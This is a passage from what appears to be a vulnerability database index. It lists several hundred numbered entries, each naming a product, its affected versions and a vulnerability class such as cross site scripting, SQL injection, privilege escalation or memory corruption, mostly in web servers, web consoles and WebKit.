Portal cross site scripting [97070] Trend Micro InterScan Web Security Virtual Appliance 6.5 IWSVA Web Console cross site scripting [97069] Trend Micro InterScan Web Security Virtual Appliance 6.5 IWSVA Web Console privilege escalation [97068] Trend Micro InterScan Web Security Virtual Appliance 6.5 IWSVA Web Console information disclosure [97067] Trend Micro InterScan Web Security Virtual Appliance 6.5 IWSVA Web Console privilege escalation [97049] IBM Security Access Manager For Web up to 9.0.2.0 weak encryption [97015] IBM WebSphere Message Broker 9.0/10.0 7PK Security Features [96937] Advantech WebAccess 8.1 sql injection [96935] Advantech WebAccess 8.1 weak authentication [96894] Moxa SoftCMS up to 1.5 Web Server denial of service [96883] Schneider Electric Magelis Web Server denial of service [96878] Schneider Electric Magelis Web Server Connection denial of service [96866] OSIsoft PI Web API 2015 R2 1.5.1 privilege escalation [96834] Sauter NovaWeb web HMI Cookie 7PK Security Features [96829] IBM WebSphere Application Server 7.0/8.0/8.5/8.5.5/9.0 Admin Console cross site scripting [96731] IBM Maximo Asset Management Web UI cross site scripting [96715] IBM Security Directory Server Web Administration Tool privilege escalation [96608] IBM Tivoli Key Lifecycle Manager 2.0.1/2.5/2.6 Web UI cross site scripting [96599] IBM Security Access Manager For Web 7.0.0/8.0.0/9.0.0 privilege escalation [96516] Cisco Firepower System Software 5.3.0/5.4.0/6.0.0/6.0.1/6.1.0 Web Content Blocker privilege escalation [96472] IBM WebSphere Application Server cross site scripting [96462] IBM WebSphere Application Server denial of service [96444] IBM WebSphere Message Broker WebAdmin Context Directory information disclosure [96397] IBM Security Access Manager For Web sql injection [96396] IBM Security Access Manager For Web URL Parameter information disclosure [96395] IBM Security Access Manager For Web information disclosure [96392] IBM Security Access Manager For Web cross site request forgery [96391] IBM Security Access Manager For Web XML External Entity [96389] IBM Security Access Manager For Web File Name information disclosure [96388] IBM Security Access Manager For Web File Permission privilege escalation [96387] IBM Security Access Manager For Web information disclosure [96386] IBM Security Access Manager For Web cross site scripting [96385] IBM Security Access Manager For Web privilege escalation [96384] IBM Security Access Manager For Web Patch weak authentication [95994] Cisco WebEx Meeting Center Redirect [95992] Cisco WebEx Meetings Server 2.7 Hostname information disclosure [95991] Cisco WebEx Meetings Server 2.6 privilege escalation [95990] Cisco WebEx Meetings Server 2.6 Password privilege escalation [95989] Cisco WebEx Meetings Server 2.6 cross site request forgery [95957] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption [95956] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption [95955] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption [95954] Apple iCloud up to 6.1.0 on Windows WebKit memory corruption [95924] Apple tvOS up to 10.1.0 WebKit information disclosure [95923] Apple tvOS up to 10.1.0 WebKit information disclosure [95922] Apple tvOS up to 10.1.0 WebKit memory corruption [95921] Apple tvOS up to 10.1.0 WebKit memory corruption [95920] Apple tvOS up to 10.1.0 WebKit memory corruption [95919] Apple tvOS up to 10.1.0 WebKit memory corruption [95918] Apple tvOS up to 10.1.0 WebKit HTMLFormElement::reset memory corruption [95917] Apple tvOS up to 10.1.0 WebKit memory corruption [95916] Apple tvOS up to 10.1.0 WebKit information disclosure [95912] Apple watchOS up to 3.1.2 WebKit information disclosure [95911] Apple watchOS up to 3.1.2 WebKit memory corruption [95869] Cisco WebEx Browser Extension memory corruption [95741] Moodle 2.x/3.x Web Service privilege escalation [95736] Moodle 2.x/3.x Web Service Token privilege escalation [95678] Oracle up to 16.2 Web Access privilege escalation [95675] Oracle up to 16.2 Web Access privilege escalation [95597] Oracle Marketing up to 12.2.6 User Interface privilege escalation [95595] Oracle Knowledge Management 12.1.1/12.1.2/12.1.3 User Interface privilege escalation [95583] Oracle CRM Technical Foundation 12.1.3 User Interface privilege escalation [95556] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0/12.2.1.1 Core Components unknown vulnerability [95547] EMC Documentum Webtop/TaskSpace/Capital Projects 6.8 cross site scripting [95538] Finance Website Script /user.profile.php sql injection [95536] Auction Website Script /news.dtl.php sql injection [95429] Inout StickBoard 1.0 /admin/pin/websitepin privilege escalation [95285] Synacor Zimbra Collaboration up to 8.6 Administration Interface cross site request forgery [95199] cPanel entropysearch.cgi Website information disclosure [95112] Splunk Enterprise up to <=5.0.16 Web privilege escalation [95098] IBM WebSphere MQ 7.0.1/7.1/7.5/8.0/9.0 Deserialize JMSObjectMessage Java privilege escalation [94920] aWeb Cart Watching System for Virtuemart up to 2.6.0 on Joomla sql injection [94617] IMP Horde Groupware/Horde Groupware Webmail Edition up to 5.2.15 data:text/html cross site scripting [94340] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94339] Apple iCloud up to 6.0 on Windows WebKit information disclosure [94338] Apple iCloud up to 6.0 on Windows WebKit information disclosure [94337] Apple iCloud up to 6.0 on Windows WebKit Javascript unknown vulnerability [94336] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94335] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94334] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94333] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94332] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94331] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94330] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94329] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94328] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94327] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94326] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94325] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94324] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94323] Apple iCloud up to 6.0 on Windows WebKit State information disclosure [94322] Apple iCloud up to 6.0 on Windows WebKit memory corruption [94321] Apple iCloud up to 6.0 on Windows WebKit State memory corruption [94320] Apple iCloud up to 6.0 on Windows WebKit memory corruption [94319] Apple iCloud up to 6.0 on Windows WebKit memory corruption [94318] Apple iCloud up to 6.0 on Windows WebKit memory corruption [94293] Apple tvOS up to 10.0 WebKit memory corruption [94292] Apple tvOS up to 10.0 WebKit information disclosure [94291] Apple tvOS up to 10.0 WebKit information disclosure [94290] Apple tvOS up to 10.0 WebKit memory corruption [94289] Apple tvOS up to 10.0 WebKit memory corruption [94288] Apple tvOS up to 10.0 WebKit memory corruption [94287] Apple tvOS up to 10.0 WebKit memory corruption [94286] Apple tvOS up to 10.0 WebKit memory corruption [94285] Apple tvOS up to 10.0 WebKit memory corruption [94284] Apple tvOS up to 10.0 WebKit memory corruption [94283] Apple tvOS up to 10.0 WebKit memory corruption [94282] Apple tvOS up to 10.0 WebKit memory corruption [94281] Apple tvOS up to 10.0 WebKit memory corruption [94280] Apple tvOS up to 10.0 WebKit memory corruption [94279] Apple tvOS up to 10.0 WebKit memory corruption [94278] Apple tvOS up to 10.0 WebKit memory corruption [94277] Apple tvOS up to 10.0 WebKit memory corruption [94276] Apple tvOS up to 10.0 WebKit information disclosure [94275] Apple tvOS up to 10.0 WebKit memory corruption [94274] Apple tvOS up to 10.0 WebKit memory corruption [94273] Apple tvOS up to 10.0 WebKit memory corruption [94272] Apple tvOS up to 10.0 WebKit memory corruption [94165] Cisco Prime Collaboration Assurance 10.5(1)/10.6 Web Framework cross site scripting [94161] Cisco Web Security Appliance 9.0.1-162/9.1.1-074 HTTP URL Parser denial of service [94051] phpMyAdmin up to 4.6.3/4.4.15.7/4.0.10.16 User Interface Preference sql injection [94020] Cisco Web Security Appliance 9.0.1-162/9.1.1-074 privilege escalation [93903] Boa Webserver 0.92r HTTP GET send_redirect privilege escalation [93791] VMware vRealize Automation 7.1.x Identity Manager /SAAS/WEB-INF File privilege escalation [93783] IBM Security Access Manager for Web privilege escalation [93774] IBM WebSphere Application Server up to 16.0.0.2 Exception information disclosure [93299] Cisco Identity Services Engine 1.3(0.876) Web Framework sql injection [93297] Cisco Prime Collaboration Provisioning 10.6 Web Framework cross site scripting [93294] Cisco IP Interoperability/Collaboration System 4.10(1) Web Framework cross site scripting [93276] Imperva SecureSphere Web Application Firewall privilege escalation [93163] HPE Financial Transaction Manager up to 3.0.0.x/3.0.1.0 iFix0001 Web UI cross site scripting [93147] Apple iCloud up to 6.0 on Windows WebKit memory corruption [93146] Apple iCloud up to 6.0 on Windows WebKit User information disclosure [93140] Cisco Email Security Appliance/Web Security Appliance Content Filter privilege escalation [93130] Cisco Email Security Appliance/Web Security Appliance Multipurpose Internet Mail Extensions Scanner 7PK Error [93097] IBM WebSphere Commerce 6.0/7.0/8.0 privilege escalation [93085] Apple tvOS up to 10.0 WebKit memory corruption [93084] Apple tvOS up to 10.0 WebKit memory corruption [93083] Apple tvOS up to 10.0 WebKit information disclosure [93009] Cisco Meeting Server Web Bridge cross site request forgery [92993] Oracle Secure Global Desktop 4.7/5.2 Web Services privilege escalation [92931] Oracle JD Edwards EnterpriseOne Tools 9.1 Web Runtime SEC memory corruption [92926] Oracle Hospitality OPERA 5 Property Services up to 5.5.1.0 OPERA Xchange Interface OXI privilege escalation [92919] Oracle Application Testing Suite 12.5.0.1/12.5.0.2/12.5.0.3 Load Testing for Web Apps weak encryption [92784] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0 WLS-WebServices memory corruption [92783] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0/12.2.1.1 memory corruption [92782] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0 privilege escalation [92778] Oracle iPlanet Web Server 7 Security memory corruption [92777] Oracle iPlanet Web Proxy Server 4 Security memory corruption [92776] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0 JavaServer Faces memory corruption [92750] Oracle WebLogic Server 10.3.6.0/12.1.3.0 Web Container denial of service [92749] Oracle WebCenter Sites 12.2.1.0.0/12.2.1.1.0/12.2.1.2.0 Security 7PK Security Features [92550] IBM WebSphere up to 7.0.0.41/8.0.0.12/8.5.5.10/9.0.0.1 Cookie Deserialization privilege escalation [92501] Symantec Web Gateway up to 5.1.1.24/5.2.1.80/5.2.2.118 new_whitelist.php privilege escalation [92495] Cisco FirePOWER Management Center 6.0.1 Web Console File information disclosure [92476] Cisco ASA DHCP Relay Interface denial of service [92456] INDAS Web SCADA 2 directory traversal [92443] IBM WebSphere Application Server up to 7.0.0.42/8.0.0.12/8.5.5.10/9.0.0.1 Java privilege escalation [92416] Sparkasse Bank WebSite blind.php cross site scripting [92415] Sparkasse Bank WebSite index.php cross site scripting [92287] Cisco Web Security Appliance 9.0.1-162 FTP Throttling memory corruption [92276] IBM WebSphere Application Server up to 16.0.0.2 Web UI cross site scripting [92173] WildFly 10.0.0 Undertow Web Server Header privilege escalation [92170] Red Hat JBoss Web Server 2.1 mod_cluster privilege escalation [92169] IBM WebSphere Application Server Redirect [92167] IBM Connections up to 4.5 CR4/5.0 CR3/5.5 Web UI cross site scripting [92166] IBM Connections up to 4.5 CR4/5.0 CR3/5.5 Web UI cross site scripting [92165] IBM Connections up to 4.5 CR4/5.0 CR3/5.5 Web UI cross site scripting [92162] IBM WebSphere MQ up to 7.5.0.6/8.0.0.4 Protocol Flow Data Processing Error [92152] Apple tvOS up to 9.x WebKit memory corruption [92151] Apple tvOS up to 9.x WebKit memory corruption [92150] Apple tvOS up to 9.x WebKit memory corruption [92149] Apple tvOS up to 9.x WebKit memory corruption [92148] Apple tvOS up to 9.x WebKit memory corruption [92147] Apple tvOS up to 9.x WebKit memory corruption [92146] Apple tvOS up to 9.x WebKit memory corruption [92145] Apple tvOS up to 9.x WebKit memory corruption [92144] Apple tvOS up to 9.x WebKit memory corruption [92143] Apple tvOS up to 9.x WebKit memory corruption [92142] Apple tvOS up to 9.x WebKit memory corruption [92141] Apple tvOS up to 9.x WebKit privilege escalation [92123] Apple watchOS up to 2.x WebKit memory corruption [91976] Facebook WebSite Bugbounty cross site scripting [91974] Twitter WebSite Groups 31-twitter-basics cross site scripting [91932] AiCart Shopping CMS 2.0 Admin Interface privilege escalation [91888] Cisco Cloud Services Platform 2100 2.0 Web-based GUI privilege escalation [91803] SonicWALL Viewpoint 6.0 SP2 FTP Usage/Top Users of FTP/Web Usage Top Sites Reflected cross site scripting [91799] SonicWALL Viewpoint 6.0 SP2 Custom Report \xE2\x80\x93 Website Filtering Persistent cross site scripting [91705] Symantec Web Gateway RAR Decompression memory corruption [91704] Symantec Web Gateway RAR Decompression information disclosure [91685] Cisco WebEx Meetings Server 2.6 Account-Validation privilege escalation [91661] Cisco Web Security Appliance up to 9.5.0-444 HTTP Request denial of service [91648] Cisco WebEx Meetings Server 2.6 privilege escalation [91634] IBM WebSphere Application Server 7.0/8.0/8.5/8.5.5/9.0.0.0 Response information disclosure [91503] PHP up to 7.0.9 ext/curl/interface.c memory corruption [91484] Medical Center Columbia WebSite Profiles /members/profiles.php sql injection [91410] IBM WebSphere Portal 6.1/7.0/8.0/8.5 File Upload privilege escalation [91354] Red Hat JBoss Operations Network up to 3.3.6 Web Console privilege escalation [91157] McAfee Web Gateway 6.8.6.x Incident Manager cross site scripting [91156] McAfee Web Gateway 6.8.6.x E-Mail Gateway / HTTP Method Filter List cross site scripting [91155] McAfee Web Gateway 6.8.6.x cross site scripting [91154] McAfee Web Gateway 6.8.6.x HMS AGENTS - Private Key Handler/Remote Service cross site scripting [91153] McAfee Web Gateway 6.8.6.x Account Overview - Allows to manage the accounts cross site scripting [91094] Barracuda Web Firewall 660 privilege escalation [91087] Bank of America Web Site cross site scripting [91075] Cisco WebEx Meetings Player T29.10 WRF File privilege escalation [91074] Cisco WebEx Meetings Player T29.10 WRF File denial of service [91032] IBM Connections up to 4.0 CR4/4.5 CR5/5.0 CR3/5.5 Web UI cross site scripting [91031] IBM Connections up to 5.0 CR3/5.5 Web UI cross site scripting [91030] IBM Connections up to 4.0 CR4/4.5 CR5/5.0 CR3/5.5 Web UI cross site scripting [91028] IBM Connections up to 4.0 CR4/4.5 CR5/5.0 CR3/5.5 Web UI cross site scripting [91027] IBM Connections up to 4.0 CR4/4.5 CR5/5.0 CR3/5.5 Web UI cross site scripting [91026] IBM Connections up to 5.0 CR3/5.5 Web UI cross site scripting [91025] IBM Connections up to 5.0 CR3/5.5 Web UI cross site scripting [90997] IBM BigFix Platform up to 9.5.1 WebReports information disclosure [90967] Red Hat CloudForms 4.1 Web UI privilege escalation [90953] Micro Focus Novell Groupwise up to 2014 R2 Service Pack 1 WebAccess/Post Office Agent memory corruption [90896] Cisco WebEx Meetings Server 2.6 privilege escalation [90892] IBM WebSphere Application Server 7.0/8.0/8.5/8.5.5 HttpSessionIdReuse memory corruption [90891] IBM WebSphere Application Server 7.0/8.0/8.5/8.5.5 CSRF Token information disclosure [90889] Foreman up to 1.12.1 host_edit_interfaces.js cross site scripting [90886] Foreman up to 1.11.3/1.12.0 API interfaces Config information disclosure [90858] Cisco FirePOWER Management Center up to 4.x/5.3.0.2/5.3.1.1/5.4.0.0 Web-based GUI privilege escalation [90856] W-Agora Web Forum index.php directory traversal [90855] NetworkActiv Web Server denial of service [90848] Horde IMP Webmail up to 3.2.5 cross site scripting [90837] BEA Systems WebLogic up to 5.1/6.1 SP6/7.0 SP5/8.1 SP2 JNDI Internal Object information disclosure [90648] SAP HANA SQL Interface User information disclosure [90647] SAP HANA up to Revision 101 SQL Interface privilege escalation [90597] IBM WebSphere Portal up to 5.0.1 Connections Portlets privilege escalation [90584] Apache ActiveMQ up to 5.11.3/5.12.2/5.13/1 Administration Web Console cross site scripting [90453] IBM WebSphere Application Server 7.0/8.0/8.5/8.5.5/9.0.0.0 SIP privilege escalation [90452] Cisco IOS 15.5(3)S3/15.6(1)S2/15.6(2)S1/15.6(2)T1 NTP Interface Queue privilege escalation [90379] IBM WebSphere Portal 6.1/7.0.0.2/8.0.0.1/8.5 cross site scripting [90371] Cisco Unified Computing System up to 2.0.0 Web Framework privilege escalation [90249] Microsoft Exchange Outlook Web Access privilege escalation [90160] Imatix Xitami Web Server /cgi-bin/testcgi information disclosure [90153] BEA WebLogic 5.1.0 HTTP GET Request /snoop information disclosure [90143] Django 1.8.13/1.9.7 Admin Interface views/debug.py cross site scripting [90064] Oracle 8.3/8.4/15.1/15.2/16.1 Web access unknown vulnerability [90062] Oracle 8.3/8.4/15.1/15.2/16.1 Web access unknown vulnerability [90061] Oracle 8.3/8.4/15.1/15.2/16.1 Web access unknown vulnerability [90060] Oracle 8.3/8.4/15.1/15.2/16.1 Web access unknown vulnerability [90059] Oracle 8.3/8.4/15.1/15.2/16.1 Web access unknown vulnerability [90058] Oracle 8.3/8.4/15.1/15.2/16.1 Web access unknown vulnerability [90057] Oracle 8.3/8.4/15.1/15.2/16.1 Web access unknown vulnerability [90056] Oracle 8.2/8.3/8.4 Web access weak authentication [90055] Oracle 8.3/8.4/15.1/15.2/16.1 Web Access unknown vulnerability [90053] Oracle up to 16.1 Web access unknown vulnerability [90052] Oracle up to 16.1 Web access privilege escalation [89981] Oracle Siebel Engineering 8.1.1/8.2.2/IP2014/IP2015/IP2016 Web Server information disclosure [89966] Oracle Agile PLM 9.3.4/9.3.5 WebClient/Admin unknown vulnerability [89949] Oracle Transportation Management up to 6.4.1 Web Container privilege escalation [89935] Oracle Application Object Library 12.1.3/12.2.3/12.2.4/12.2.5 Web based help screens information disclosure [89908] Oracle WebLogic Server 10.3.6.0/12.1.3.0 Web Container denial of service [89907] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0 Analytics Web Administration unknown vulnerability [89906] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0 Web Server unknown vulnerability [89902] Oracle Access Manager 10.1.4.x/11.1.1.7 Web Server Plugin information disclosure [89901] Oracle WebCenter Sites 11.1.1.8/12.2.1.0 unknown vulnerability [89898] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/11.2.1.0.0 Analytics Web General unknown vulnerability [89897] Oracle WebCenter Sites 11.1.1.8/12.2.1.0 unknown vulnerability [89894] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0 Analytics Web Administration unknown vulnerability [89875] Oracle WebLogic Server 12.1.3.0/12.2.1.0 Web Container memory corruption [89874] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0 memory corruption [89873] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.0 memory corruption [89872] Oracle GlassFish Server 3.0.1/3.1.2 Web Container memory corruption [89848] Apple tvOS up to 9.2.1 WebKit Page Loading cross site scripting [89847] Apple tvOS up to 9.2.1 WebKit Page Loading memory corruption [89846] Apple tvOS up to 9.2.1 WebKit denial of service [89845] Apple tvOS up to 9.2.1 WebKit privilege escalation [89844] Apple tvOS up to 9.2.1 WebKit Memory memory corruption [89843] Apple tvOS up to 9.2.1 WebKit race condition [89842] Apple tvOS up to 9.2.1 WebKit memory corruption [89841] Apple tvOS up to 9.2.1 WebKit memory corruption [89840] Apple tvOS up to 9.2.1 WebKit memory corruption [89839] Apple tvOS up to 9.2.1 WebKit memory corruption [89838] Apple tvOS up to 9.2.1 WebKit memory corruption [89837] Apple tvOS up to 9.2.1 WebKit memory corruption [89658] Sun iPlanet Web Server /.perf information disclosure [89620] Cisco WebEx Meetings Server 2.7 cross site request forgery [89598] BEA WebLogic Server up to 4.5.1/4.5.2/6.1 SP 2 Source information disclosure [89497] Monit Web Server denial of service [89496] Monit Web Server Basic Header denial of service [89469] Cisco WebEx Meetings Server 2.6 privilege escalation [89468] Cisco WebEx Meetings Server 2.6 cross site scripting [89466] Cisco WebEx Meetings Server 2.6 sql injection [89459] IBM Tivoli Directory Server up to 6.1.0/6.2.0/6.3.0/6.3.1 Web Administration Tool information disclosure [89444] Microsoft Windows Remote Desktop/Terminal Services Web Connection weak authentication [89278] Zeus Web Server vs_diag.cgi cross site scripting [89243] Juniper Junos J-Web weak authentication [89171] ZyXEL Prestige 642R/Prestige 642R-I Administration Interface weak authentication [89146] David Yuan Forum Web Server up to 1.60 privilege escalation [89000] Moxa 5232-N Web Console weak authentication [88890] Michael Lamont Savant Web Server 3.1 GET Request Folder privilege escalation [88854] Zeus Webserver up to 4.0/4.1 r5/4.2/4.2 r2 vs_diag.cgi privilege escalation [88842] Dune Web Server 0.6.7 privilege escalation [88840] WebCalendar long.php File information disclosure [88824] IBM WebSphere Application Server 8.5.5.8/8.5.5.9 API Discovery privilege escalation [88823] IBM WebSphere Application Server up to 8.5.5.8 JAX-RS API Cookie information disclosure [88816] IBM WebSphere Application Server up to 8.5.5.2 Admin Center information disclosure [88743] Citrix Nfuse Webserver information disclosure [88732] Check Point Firewall-1 Web Administration information disclosure [88726] BEA WebLogic Server 5.1/6.1/7.0/7.0.0.1 Certificate weak authentication [88681] Instaboard Web Forum sql injection [88641] IBM Domino Server Web Request privilege escalation [88611] 4D WebStar FTP Server Authentication memory corruption [88595] IBM WebSphere 2.0/3.0/3.0.2/3.0.2.1 cross site scripting [88588] Roxen Challenger Webserver Counter Module denial of service [88535] IBM WebSphere Message Broker up to 8.0.0.7 Integration Server Version information disclosure [88530] IBM WebSphere DataPower XC10 appliance 2.1/2.5 CLI memory corruption [88527] IBM WebSphere Commerce 7.0 FP8/8.0.0.9/8.0.1.1 cross site request forgery [88526] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0/8.5.0.2/8.6.0.7 information disclosure [88507] IBM WebSphere eXtreme Scale up to 7.1.0.2/7.1.1.0/8.5.0.2/8.6.0.7 privilege escalation [88484] BEA WebLogic 3.2.1/4.0.0 default.jsp Source information disclosure [88481] Check Point Software Firewall-1 Client Authentication Web Server information disclosure [88448] IBM WebSphere Commerce 6.0/7.0/8.0 Store Pages cross site scripting [88444] Webmin information disclosure [88411] Michael Lamont Savant Web Server 3.0 HTTP GET Request denial of service [88409] Northern Solutions Xeneo Web Server 2.2.9.0 denial of service [88407] MDG Web Server 4d 3.6.0 HTTP GET Request denial of service [88385] Symantec Endpoint Protection Manager up to 12.1.6 MP4 Authentication Interface privilege escalation [88364] IBM WebSphere MQ up to 8.0.0.4 Queue-Manager Agent denial of service [88334] Cisco Web Security Appliance FTP denial of service [88333] IBM WebSphere Application Server 7.0/8.0/8.5/8.5.5 HTTP Response Splitting privilege escalation [88323] Xitami Web Server 2.4 c3/2.4 d3 memory corruption [88306] SalD Dr. Web Anti Virus up to 4.28 File Name memory corruption [88295] BEA WebLogic Server up to 6.0 directory traversal [88294] BEA WebLogic up to 7.0.0.1 SP2 Redirect Hostname information disclosure [88255] Web Server HTTP Method information disclosure [88178] Microsoft Windows Network Interface information disclosure [88141] Alt-N MDaemon 12.5.6/13.0.3 WebAdmin User Account Import privilege escalation [88110] Advantech WebAccess up to 8.1 ActiveX Control privilege escalation [88107] IBM WebSphere Portal up to 8.5 CF10 cross site request forgery [88094] EMC Documentum Administrator IAPI/IDQL Interface privilege escalation [87881] EMC RSA Archer eGRC 5.5.x Backup File web.config Password information disclosure [87829] Trihedral VTScada up to 11.2.01 WAP Interface memory corruption [87826] Trihedral VTScada up to 11.2.01 WAP Interface weak authentication [87731] Epoch Web Mailing List up to 0.31 cross site scripting [87702] Apache ActiveMQ up to 5.13.x Fileserver Web Application Upload privilege escalation [87696] Cisco Web Security Appliance/Email Security Appliance Advance Malware Protection libclamav memory corruption [87642] Cisco WebEx Meeting Center User information disclosure [87553] Cisco Unified Computing System 1.4(1a) Management Interface cross site scripting [87549] Cisco Web Security Appliance up to 8.8 HTTP Response Code Memory denial of service [87548] Cisco Web Security Appliance up to 8.8 HTTP Length Request privilege escalation [87547] Cisco Web Security Appliance 8.5/8.6/8.7/8.8/9.1 Cached File Memory denial of service [87546] Cisco Web Security Appliance up to 8.5.3-055 HTTP POST Request privilege escalation [87412] IBM WebSphere Application Server up to 7.0.0.40/8.0.0.12/8.5.5.9 FIPS 140-2 information disclosure [87076] IBM Tivoli Access Manager for e-business ibm/wpm/webseal cross site scripting [86859] JBoss Web Console createThresholdMonitor.jsp cross site scripting [86770] HotScripts PHP Website Script lostpassword.php cross site scripting [86769] HotScripts PHP Website Script feedback.php cross site scripting [86721] WebSPELL awards.php sql injection [86714] GlassFish Enterprise Server webServicesGeneral.jsf cross site scripting [86695] HP Embedded Web Server config cross site request forgery [86694] HP Embedded Web Server config cross site request forgery [86388] IBM WebSphere Application Server cross site scripting [86369] WebCalendar search.php cross site scripting [86368] WebCalendar pref.php cross site scripting [86050] Weblogicnet es_offer.php privilege escalation [86049] Weblogicnet es_custom_menu.php privilege escalation [85516] Web-app.org WebAPP cross site scripting [85261] PhpWebGallery Search.php cross site scripting [85165] Web-app.org WebAPP information disclosure [85164] Web-app.org WebAPP cross site scripting [85163] Web-app.org WebAPP cross site scripting [85162] Web-app.org WebAPP cross site scripting [85161] Web-app.org WebAPP cross site scripting [85160] Web-app.org WebAPP cross site scripting [85159] Web-app.org WebAPP cross site scripting [85158] Web-app.org WebAPP cross site scripting [85156] cPanel WebHost Manager scripts2/objcache privilege escalation [85153] MailEnable Web Mail Forms/MAI/list.asp cross site scripting [85152] MailEnable Web Mail right.asp cross site scripting [85135] Hitachi Web Server cross site scripting [85132] Symantec Web Security cross site scripting [85055] Joomla CMS weblinks.php sql injection [84731] PHP Web WebYep WYShortTextElement.php privilege escalation [84730] PHP Web WebYep WYMenuElement.php privilege escalation [84729] PHP Web WebYep WYLoopElement.php privilege escalation [84728] PHP Web WebYep WYLongTextElement.php privilege escalation [84727] PHP Web WebYep WYLogonButtonElement.php privilege escalation [84726] PHP Web WebYep WYImageElement.php privilege escalation [84725] PHP Web WebYep WYGuestbookElement.php privilege escalation [84724] PHP Web WebYep WYGalleryElement.php privilege escalation [84723] PHP Web WebYep WYTextArea.php privilege escalation [84722] PHP Web WebYep WYSelectMenu.php privilege escalation [84721] PHP Web WebYep WYPopupWindowLink.php privilege escalation [84720] PHP Web WebYep WYPath.php privilege escalation [84719] PHP Web WebYep WYLink.php privilege escalation [84718] PHP Web WebYep WYLanguage.php privilege escalation [84717] PHP Web WebYep WYImage.php privilege escalation [84716] PHP Web WebYep WYHTMLTag.php privilege escalation [84715] PHP Web WebYep WYFile.php privilege escalation [84714] PHP Web WebYep WYElement.php privilege escalation [84713] PHP Web WebYep WYEditor.php privilege escalation [84712] PHP Web WebYep WYDocument.php privilege escalation [84691] Comdev Web Blogger include.php privilege escalation [84518] Webmin/Usermin cross site scripting [84069] WebprojectDB lang.php privilege escalation [83632] Quick 'n Easy Web Server File Name privilege escalation [83619] 1WebCalendar mainCal.cfm sql injection [83618] 1WebCalendar /news/newsView.cfm sql injection [83563] Easy File Sharing Web Server option.ini information disclosure [83347] PhpWebGallery picture.php sql injection [83346] PhpWebGallery category.php sql injection [83293] Web4Future eCommerce viewbrands.php sql injection [83292] Web4Future eCommerce index.php sql injection [83241] WebCalendar export_handler.php sql injection [83240] WebCalendar edit_template.php sql injection [83239] WebCalendar admin_handler.php sql injection [83238] PHP Web Statistik HTTP Header pixel.php cross site scripting [83237] PHP Web Statistik Log Database logdb.dta information disclosure [83153] SAP Web Application Server Test Application cross site scripting [83152] SAP Web Application Server privilege escalation [83044] Invision Power Board Admin Interface cross site scripting [83043] Invision Power Board Admin Interface cross site scripting [83042] Invision Power Board Admin Interface cross site scripting [83040] Invision Power Board Admin Interface cross site scripting [83039] Invision Power Board Admin Interface cross site scripting [83033] Cisco WebEx Meetings Server 2.6 Redirect [83009] PHP-Nuke Web_Links Module sql injection [82883] Baby Web Server File privilege escalation [82750] Ecava IntegraXor up to 5.0 HMI Web Server weak encryption [82608] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3 Core Components unknown vulnerability [82604] Oracle WebLogic Server 10.3.6 Console unknown vulnerability [82603] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.0.0 Analytics Web General unknown vulnerability [82600] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3/12.2.1 Console unknown vulnerability [82599] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3 Console unknown vulnerability [82598] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3 Console unknown vulnerability [82593] Oracle iPlanet Web Server 7 Security memory corruption [82592] Oracle iPlanet Web Proxy Server 4 Security memory corruption [82591] Oracle WebLogic Server 10.3.6/12.1.2/12.1.3/12.2.1 Java Messaging Service unknown vulnerability [82590] Oracle WebCenter Sites 11.1.1.8.0/12.2.1 privilege escalation [82489] Ashleys Web Server HTTP Request memory corruption [82443] OpenStack Object Storage Staticweb Middleware information disclosure [82390] Citrix Command Center up to 5.1/5.2 Web UI sql injection [82374] MCPWS Personal Webserver File Request denial of service [82358] TinyWeb Web Server CGI Request denial of service [82356] Novell NetWare Enterprise Web Server /com Path information disclosure [82355] Novell NetWare Enterprise Web Server /com/novell/webaccess Directory information disclosure [82354] Microsoft IIS WebDAV denial of service [82340] Horde Groupware Webmail Edition up to 5.2.11 _menubar.html.php cross site scripting [82320] Horde Groupware Webmail Edition up to 5.2.11 Html.php _renderVarInput_number cross site scripting [82276] Palo Alto PAN-OS up to 5.0.17/5.1.10/6.0.12/6.1.9/7.0.2H1 Device Management Command Line Interface privilege escalation [82062] Lenovo LenovoEMC EZ Media / Backup up to 4.1.204 Management Interface 7PK Security Features [82003] Web Wiz Forums pop_up_ip_blocking.asp denial of service [81994] BEA WebLogic Deleted Group privilege escalation [81933] BEA WebLogic HTTP Request cross site scripting [81844] Linksys WRT54G Web Server denial of service [81829] PHP Based Web Chat Manager register.php cross site scripting [81825] BEA Systems WebLogic Server up to 7.0 SP 1/7.0.0.1 SP 1 memory corruption [81820] Web Wiz Forums 6.34 asp information disclosure [81819] Nokia IPSO Voyager WebGUI /cgi-bin/readfile.tcl File information disclosure [81749] AutomatedShops WebC.cgi privilege escalation 